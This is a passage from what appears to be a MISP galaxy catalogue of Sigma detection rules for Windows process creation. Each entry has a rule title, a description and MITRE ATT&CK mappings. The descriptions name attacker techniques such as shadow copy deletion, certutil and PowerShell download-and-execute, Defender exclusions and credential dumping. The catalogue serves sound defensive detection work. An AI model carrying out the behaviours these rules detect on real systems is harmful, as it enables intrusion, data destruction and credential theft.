The tag is: misp-galaxy:sigma-rules="Nltest.EXE Execution"

Nltest.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 10256. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_execution.yml

Remote Access Tool - Simple Help Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - Simple Help Execution"

Remote Access Tool - Simple Help Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10257. Table References

Links

https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_simple_help.yml

Shadow Copies Deletion Using Operating Systems Utilities

Shadow Copies deletion using operating systems utilities

The tag is: misp-galaxy:sigma-rules="Shadow Copies Deletion Using Operating Systems Utilities"

Shadow Copies Deletion Using Operating Systems Utilities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10258. Table References

Links

https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100

https://github.com/Neo23x0/Raccine#the-process

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/

https://redcanary.com/blog/intelligence-insights-october-2021/

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/

https://blog.talosintelligence.com/2017/05/wannacry.html

https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml

Fsutil Drive Enumeration

Attackers may leverage fsutil to enumerated connected drives.

The tag is: misp-galaxy:sigma-rules="Fsutil Drive Enumeration"

Fsutil Drive Enumeration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

Table 10259. Table References

Links

Turla has used fsutil fsinfo drives to list connected drives.[Turla has used fsutil fsinfo drives to list connected drives.]

https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml

Lolbin Ssh.exe Use As Proxy

Detect usage of the "ssh.exe" binary as a proxy to launch other programs

The tag is: misp-galaxy:sigma-rules="Lolbin Ssh.exe Use As Proxy"

Lolbin Ssh.exe Use As Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10260. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ssh/

https://gtfobins.github.io/gtfobins/ssh/

https://man.openbsd.org/ssh_config#LocalCommand

https://github.com/LOLBAS-Project/LOLBAS/pull/211/files

https://man.openbsd.org/ssh_config#ProxyCommand

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml

Potential Suspicious Activity Using SeCEdit

Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Activity Using SeCEdit"

Potential Suspicious Activity Using SeCEdit has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Terminal Services DLL - T1505.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Active Setup - T1547.014" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Authentication Package - T1547.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 10261. Table References

Links

https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_secedit_execution.yml

Wab Execution From Non Default Location

Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity

The tag is: misp-galaxy:sigma-rules="Wab Execution From Non Default Location"

Table 10262. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime

https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml

File Download Via Bitsadmin

Detects usage of bitsadmin downloading a file

The tag is: misp-galaxy:sigma-rules="File Download Via Bitsadmin"

File Download Via Bitsadmin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10263. Table References

Links

https://isc.sans.edu/diary/22264

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml

Potentially Suspicious Office Document Executed From Trusted Location

Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Office Document Executed From Trusted Location"

Potentially Suspicious Office Document Executed From Trusted Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10264. Table References

Links

https://twitter.com/Max_Mal_/status/1633863678909874176

https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465

https://twitter.com/_JohnHammond/status/1588155401752788994

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml

Potential Suspicious Registry File Imported Via Reg.EXE

Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Registry File Imported Via Reg.EXE"

Potential Suspicious Registry File Imported Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10265. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml

Use of VSIISExeLauncher.exe

The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries

The tag is: misp-galaxy:sigma-rules="Use of VSIISExeLauncher.exe"

Use of VSIISExeLauncher.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10266. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml

Regedit as Trusted Installer

Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe

The tag is: misp-galaxy:sigma-rules="Regedit as Trusted Installer"

Regedit as Trusted Installer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 10267. Table References

Links

https://twitter.com/1kwpeter/status/1397816101455765504

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_trustedinstaller.yml

Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Detects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.

The tag is: misp-galaxy:sigma-rules="Bad Opsec Defaults Sacrificial Processes With Improper Arguments"

Bad Opsec Defaults Sacrificial Processes With Improper Arguments has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10268. Table References

Links

https://twitter.com/CyberRaiju/status/1251492025678983169

https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32

https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/

https://www.cobaltstrike.com/help-opsec

https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml

Suspicious File Downloaded From Direct IP Via Certutil.EXE

Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.

The tag is: misp-galaxy:sigma-rules="Suspicious File Downloaded From Direct IP Via Certutil.EXE"

Suspicious File Downloaded From Direct IP Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10269. Table References

Links

https://twitter.com/_JohnHammond/status/1708910264261980634

https://forensicitguy.github.io/agenttesla-vba-certutil-download/

https://twitter.com/egre55/status/1087685529016193025

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

https://lolbas-project.github.io/lolbas/Binaries/Certutil/

https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml

Potential RDP Tunneling Via SSH

Execution of ssh.exe to perform data exfiltration and tunneling through RDP

The tag is: misp-galaxy:sigma-rules="Potential RDP Tunneling Via SSH"

Potential RDP Tunneling Via SSH has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 10270. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml

Arbitrary File Download Via IMEWDBLD.EXE

Detects usage of "IMEWDBLD.exe" to download arbitrary files

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via IMEWDBLD.EXE"

Arbitrary File Download Via IMEWDBLD.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10271. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download

https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imewbdld_download.yml

REGISTER_APP.VBS Proxy Execution

Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.

The tag is: misp-galaxy:sigma-rules="REGISTER_APP.VBS Proxy Execution"

REGISTER_APP.VBS Proxy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10272. Table References

Links

https://twitter.com/sblmsrsn/status/1456613494783160325?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml

Suspicious Service Binary Directory

Detects a service binary running in a suspicious directory

The tag is: misp-galaxy:sigma-rules="Suspicious Service Binary Directory"

Suspicious Service Binary Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10273. Table References

Links

https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml

Modify Group Policy Settings

Detect malicious GPO modifications can be used to implement many other malicious behaviors.

The tag is: misp-galaxy:sigma-rules="Modify Group Policy Settings"

Modify Group Policy Settings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001" with estimative-language:likelihood-probability="almost-certain"

Table 10274. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml

Renamed Vmnat.exe Execution

Detects renamed vmnat.exe or portable version that can be used for DLL side-loading

The tag is: misp-galaxy:sigma-rules="Renamed Vmnat.exe Execution"

Renamed Vmnat.exe Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 10275. Table References

Links

https://twitter.com/malmoeb/status/1525901219247845376

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml

HackTool - LocalPotato Execution

Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples

The tag is: misp-galaxy:sigma-rules="HackTool - LocalPotato Execution"

Table 10276. Table References

Links

https://github.com/decoder-it/LocalPotato

https://www.localpotato.com/localpotato_html/LocalPotato.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_localpotato.yml

HackTool - Impersonate Execution

Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively

The tag is: misp-galaxy:sigma-rules="HackTool - Impersonate Execution"

HackTool - Impersonate Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Make and Impersonate Token - T1134.003" with estimative-language:likelihood-probability="almost-certain"

Table 10277. Table References

Links

https://github.com/sensepost/impersonate

https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impersonate.yml

Arbitrary File Download Via PresentationHost.EXE

Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via PresentationHost.EXE"

Arbitrary File Download Via PresentationHost.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10278. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/239/files

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_presentationhost_download.yml

Suspicious Processes Spawned by Java.EXE

Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)

The tag is: misp-galaxy:sigma-rules="Suspicious Processes Spawned by Java.EXE"

Table 10279. Table References

Links

https://www.lunasec.io/docs/blog/log4j-zero-day/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_susp_child_process.yml

Potential Credential Dumping Attempt Using New NetworkProvider - CLI

Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Attempt Using New NetworkProvider - CLI"

Potential Credential Dumping Attempt Using New NetworkProvider - CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10280. Table References

Links

https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy

https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_new_network_provider.yml

Use of Pcalua For Execution

Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.

The tag is: misp-galaxy:sigma-rules="Use of Pcalua For Execution"

Use of Pcalua For Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10281. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Pcalua/

https://pentestlab.blog/2020/07/06/indirect-command-execution/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml

Install New Package Via Winget Local Manifest

Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later.

The tag is: misp-galaxy:sigma-rules="Install New Package Via Winget Local Manifest"

Install New Package Via Winget Local Manifest has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10282. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Winget/

https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget

https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml

Non-privileged Usage of Reg or Powershell

Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry

The tag is: misp-galaxy:sigma-rules="Non-privileged Usage of Reg or Powershell"

Non-privileged Usage of Reg or Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10283. Table References

Links

https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml

Usage Of Web Request Commands And Cmdlets

Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine

The tag is: misp-galaxy:sigma-rules="Usage Of Web Request Commands And Cmdlets"

Usage Of Web Request Commands And Cmdlets has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10284. Table References

Links

https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell

https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps

https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml

Using SettingSyncHost.exe as LOLBin

Detects using SettingSyncHost.exe to run hijacked binary

The tag is: misp-galaxy:sigma-rules="Using SettingSyncHost.exe as LOLBin"

Using SettingSyncHost.exe as LOLBin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008" with estimative-language:likelihood-probability="almost-certain"

Table 10285. Table References

Links

https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml

Suspicious Process Parents

Detects suspicious parent processes that should not have any children or should only have a single possible child program

The tag is: misp-galaxy:sigma-rules="Suspicious Process Parents"

Suspicious Process Parents has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10286. Table References

Links

https://twitter.com/x86matthew/status/1505476263464607744?s=12

https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml

Powershell Defender Exclusion

Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets

The tag is: misp-galaxy:sigma-rules="Powershell Defender Exclusion"

Powershell Defender Exclusion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10287. Table References

Links

https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://twitter.com/AdamTheAnalyst/status/1483497517119590403

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml

Arbitrary Binary Execution Using GUP Utility

Detects execution of the Notepad++ updater (gup) to launch other commands or executables

The tag is: misp-galaxy:sigma-rules="Arbitrary Binary Execution Using GUP Utility"

Table 10288. Table References

Links

https://twitter.com/nas_bench/status/1535322445439180803

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml

Suspicious CodePage Switch Via CHCP

Detects a code page switch in command line or batch scripts to a rare language

The tag is: misp-galaxy:sigma-rules="Suspicious CodePage Switch Via CHCP"

Suspicious CodePage Switch Via CHCP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10289. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers

https://twitter.com/cglyer/status/1183756892952248325

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml

Kavremover Dropped Binary LOLBIN Usage

Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.

The tag is: misp-galaxy:sigma-rules="Kavremover Dropped Binary LOLBIN Usage"

Kavremover Dropped Binary LOLBIN Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10290. Table References

Links

https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml

DllUnregisterServer Function Call Via Msiexec.EXE

Detects MsiExec loading a DLL and calling its DllUnregisterServer function

The tag is: misp-galaxy:sigma-rules="DllUnregisterServer Function Call Via Msiexec.EXE"

DllUnregisterServer Function Call Via Msiexec.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 10291. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md

https://lolbas-project.github.io/lolbas/Binaries/Msiexec/

https://twitter.com/st0pp3r/status/1583914515996897281

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml

Password Provided In Command Line Of Net.EXE

Detects a when net.exe is called with a password in the command line

The tag is: misp-galaxy:sigma-rules="Password Provided In Command Line Of Net.EXE"

Password Provided In Command Line Of Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 10292. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_password_plaintext.yml

Recon Information for Export with Command Prompt

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

The tag is: misp-galaxy:sigma-rules="Recon Information for Export with Command Prompt"

Recon Information for Export with Command Prompt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

Table 10293. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml

Service Registry Key Deleted Via Reg.EXE

Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services

The tag is: misp-galaxy:sigma-rules="Service Registry Key Deleted Via Reg.EXE"

Service Registry Key Deleted Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10295. Table References

Links

https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml

Potentially Suspicious GoogleUpdate Child Process

Detects potentially suspicious child processes of "GoogleUpdate.exe"

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious GoogleUpdate Child Process"

Table 10296. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_googleupdate_susp_child_process.yml

Shell32 DLL Execution in Suspicious Directory

Detects shell32.dll executing a DLL in a suspicious directory

The tag is: misp-galaxy:sigma-rules="Shell32 DLL Execution in Suspicious Directory"

Shell32 DLL Execution in Suspicious Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10297. Table References

Links

https://www.group-ib.com/resources/threat-research/red-curl-2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml

Suspicious PowerShell Download and Execute Pattern

Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Download and Execute Pattern"

Suspicious PowerShell Download and Execute Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10299. Table References

Links

https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html

https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml

Use of Setres.exe

